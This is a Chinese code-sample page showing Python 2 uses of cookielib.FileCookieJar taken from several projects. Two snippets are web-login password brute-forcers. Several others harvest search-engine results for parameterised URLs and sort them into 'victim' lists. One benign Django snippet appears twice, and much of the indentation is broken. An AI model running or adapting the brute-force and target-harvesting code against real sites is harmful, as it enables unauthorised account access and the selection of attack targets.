Python cookielib 模块,FileCookieJar() 实例源码

我们从Python开源项目中,提取了以下8个代码示例,用于说明如何使用cookielib.FileCookieJar()

项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc):
    uRLS = []
    counter = 0
        while counter < int(maxc):
                jar = cookielib.FileCookieJar("cookies")
                query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype
                results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
                request_web = urllib2.Request(results_web)
        agent = random.choice(header)
                request_web.add_header('User-Agent', agent)
        opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                text = opener_web.open(request_web).read()
        strreg = re.compile('(?<=href=")(.*?)(?=")')
                names = strreg.findall(text)
        counter += 100
                for name in names:
                        if name not in uRLS:
                                if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                                        pass
                elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
                                        pass
                else:
                                        uRLS.append(name)
    tmpList = []; finalList = []
    print "[+] URLS (unsorted) :", len(uRLS)
        for entry in uRLS:
        try:
            t2host = entry.split("/",3)
            domain = t2host[2]
            if domain not in tmpList and "=" in entry:
                finalList.append(entry)
                tmpList.append(domain)
        except:
            pass
    print "[+] URLS (sorted)   :", len(finalList)
    return finalList
项目:PyHack    作者:lanxia    | 项目源码 | 文件源码
def webBruter(self):
        while not self.password.empty() and not self.found:
            brute = self.password.get().rstrip()
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(targetUrl)

            page = response.read()

            print "Trying: %s : %s (%d left)" % (self.userName, brute, self.password.qsize())

            parser = BruteParser()
            parser.feed(page)

            postTags = parser.tagResults
            postTags[userNameField] = self.userName
            postTags[passwordField] = brute

            loginData = urllib.urlencode(postTags)
            loginResponse = opener.open(targetPost, loginData)
            loginResult = loginResponse.read()

            if successCheck in loginResult:
                self.found = True

                print "[*] Bruteforce successful."
                print "[*] Username: %s" % userName
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."
项目:django-learning    作者:adoggie    | 项目源码 | 文件源码
def __init__(self,name=''):
        self.name = name
        self.cookie = cookielib.CookieJar()
        cookie_file = 'cookie.txt'
        # cookie = cookielib.MozillaCookieJar(cookie_file)
        # self.cookie = cookielib.FileCookieJar(cookie_file)
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor( self.cookie))
        self.headers ={"User-agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        for line in HEADERS.split('\n'):
            if not line.strip(): continue
            k,v = line.split(':')
            self.headers[k] = v

        self.method = 'GET'
项目:django-learning    作者:adoggie    | 项目源码 | 文件源码
def __init__(self,name=''):
        self.name = name
        self.cookie = cookielib.CookieJar()
        cookie_file = 'cookie.txt'
        # cookie = cookielib.MozillaCookieJar(cookie_file)
        # self.cookie = cookielib.FileCookieJar(cookie_file)
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor( self.cookie))
        self.headers ={"User-agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        for line in HEADERS.split('\n'):
            if not line.strip(): continue
            k,v = line.split(':')
            self.headers[k] = v

        self.method = 'GET'
项目:trojan    作者:Hackerl    | 项目源码 | 文件源码
def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            #??????
            brute=self.password_q.get().rstrip()
            #??cookie
            jar=cookielib.FileCookieJar("cookies")
            #???????????cookie?jar
            opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            #??????
            response=opener.open(target_url)
            page=response.read()
            print 'Trying: %s : %s (%d left)'%(self.username,brute,self.password_q.qsize())
            #????????????
            parser=BruterParser()
            parser.feed(page)
            #??????
            post_tags=parser.tag_results
            #??????
            post_tags[username_field]=self.username
            post_tags[password_field]=brute
            #?????post??
            login_data=urllib.urlencode(post_tags)
            #?????????cookie????
            login_response=opener.open(target_post,login_data)
            #????
            login_result=login_response.read()
            #???????????????????
            if failed_check not in login_result:
                self.found=True

                print '[*] Bruteforce successful'
                print '[*] Username: %s'%username
                print '[*] Password: %s'%brute
                print '[*] Waiting for other threads to exit...'
#??????input????
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def gHarv(dork,site,dP,cxe,output,gnum,maxcount):
    global GoogleURLS, tmplist
        counter = 0;global gcount;gcount+=1;GoogleURLS = []
        try:
                CXr = CXdic[cxe]
                header = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'
                saveCount = len(GoogleURLS);cmpslptime = 0;lastlen = 0
                while counter < int(maxcount):
                        jar = cookielib.FileCookieJar("cookies")
                        query = dP+dork+'+site:'+site
            gnum = int(gnum)
                        results_web = 'http://www.google.com/cse?cx='+CXr+'&q='+query+'&num='+repr(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
                        request_web = urllib2.Request(results_web);agent = random.choice(header)
                        request_web.add_header('User-Agent', agent);opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                        text = opener_web.open(request_web).read();strreg = re.compile('(?<=href=")(.*?)(?=")')
                        names = strreg.findall(text)
                        for name in names:
                                if name not in GoogleURLS:
                                        if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                                                pass
                                        elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("blackle", name):
                                                pass
                                        else:
                        if output == 1:
                                                    txtField.insert(END,name+'\n')
                        else:
                            pass
                                                GoogleURLS.append(name)
                        sleeptimer = random.choice(rSA);time.sleep(sleeptimer)
                        cmpslptime += sleeptimer;counter += int(gnum)
                        percent = int((1.0*counter/int(maxcount))*100)
                        laststatstring = 'Current MaxCount : '+repr(counter)+' | Last Query Sleeptimer ('+repr(sleeptimer)+') | Percent Done : '+repr(percent)
                        statList.append(laststatstring)                 
                        modStatus()     
        TestHost_bttn.configure(state=NORMAL,fg=fgCol)
                if iC == True:
                        for entry in GoogleURLS:
                                global tmplist
                                if '=' in entry: tmplist.append(entry)
                else:
                        pass
        for url in GoogleURLS:
            try:
                part = url.split('?')
                var = part[1].split('&')
                cod = ""
                for x in var:
                    strX = x.split("=")
                    cod += strX[0]
                    parmURL = part[0]+cod
                    if parmURL not in ParmURLS_List and url not in tmplist:
                        ParmURLS_List.append(parmURL)
                        tmplist.append(url)
            except:
                pass
        tmplist.sort()
        txtField.insert(END,'\nFound URLS: '+repr(len(GoogleURLS))+'\t\tTotal Parm-dupe Checked URLS: '+repr(len(tmplist)))
        txtField.insert(END,'\nGoogle Search Finished...\n')
        except IOError:
                pass
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def gharv(magicWord):
    vUniq = []
    for site in sitearray:
        counter = 0;bcksp = 0
        try:
            CXname = CXdic.keys()[int(random.random()*len(CXdic.keys()))];CXr = CXdic[CXname]
            print "\n| Site : ", site, " | CSEngine : ", CXname+" | Progress : ",
            saveCount = len(targets);cmpslptime = 0;lastlen = 0
            while counter < maxcount:
                jar = cookielib.FileCookieJar("cookies")
                query = magicWord+'+'+dork+'+site:'+site
                    results_web = 'http://www.google.com/cse?cx='+CXr+'&q='+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
                    request_web = urllib2.Request(results_web);agent = random.choice(header)
                    request_web.add_header('User-Agent', agent);opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                    text = opener_web.open(request_web).read();strreg = re.compile('(?<=href=")(.*?)(?=")')
                names = strreg.findall(text)
                    for name in names:
                    if name not in targets:
                        if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                            pass
                        elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name):
                            pass
                                    else:
                            targets.append(name)
                sleeptimer = random.choice(rSA);time.sleep(sleeptimer)
                cmpslptime += sleeptimer;counter += gnum
                percent = int((1.0*counter/maxcount)*100)
                if bcksp == 1:
                    stroutlen = 0
                    while stroutlen < lastlen:
                        sys.stdout.write("\10");stroutlen += 1
                sys.stdout.write("%s(%s) - %s percent" % (counter,sleeptimer,percent))
                lastlen = len(str(counter)+str(sleeptimer)+str(percent))+13
                sys.stdout.flush()
                bcksp = 1
            sys.stdout.write(" | %s Strings recieved, in %s seconds" % (len(targets)-saveCount,cmpslptime))
        except IOError:
            sys.stdout.write(" | %s Strings recieved" % (len(targets)-saveCount))
    firstparm = '';uList = []
    for entry in targets:
            thost = entry.rsplit("=");t2host = entry.rsplit("/")
            try:
                    firstparm = thost[1];domain = t2host[2]
                    if domain not in uList:
                            if '.'+dorkEXT+'?' in entry and firstparm.isdigit() == True:
                                    uniqvictims.append(entry);uList.append(domain)
                                    pass
                            elif 'http://' in entry and 'index.' in entry and firstparm.isalpha() == True:
                                    spidervictims.append(entry);uList.append(domain)
                                    pass
                            else:
                                    miscVic.append(entry)
                                    pass
            except:
                    pass
# ScanQueue Builder
项目:WebHackSHL    作者:SecHackLabs    | 项目源码 | 文件源码
def search(inurl, maxc):
  urls = []
  for site in sitearray:
    page = 0
    try:
      while page < int(maxc):
    jar = cookielib.FileCookieJar("cookies")
    query = inurl+"+site:"+site
    results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
    request_web =urllib2.Request(results_web)
    agent = random.choice(header)
    request_web.add_header('User-Agent', agent)
    opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    text = opener_web.open(request_web).read()
    stringreg = re.compile('(?<=href=")(.*?)(?=")')
        names = stringreg.findall(text)
        page += 1
        for name in names:
      if name not in urls:
        if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
          pass
        elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
          pass
        else:
          urls.append(name)
    percent = int((1.0*page/int(maxc))*100)
    urls_len = len(urls)
    sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
    sys.stdout.flush()
    except(KeyboardInterrupt):
      pass
  tmplist = []
  print "\n\n[+] URLS (Sin Clasificar): ",len(urls)
  for url in urls:
    try:
      host = url.split("/",3)
      domain = host[2]
      if domain not in tmplist and "=" in url:
    finallist.append(url)
    tmplist.append(domain)

    except:
      pass
  print "[+] URLS (Clasificada)  : ",len(finallist)
  return finallist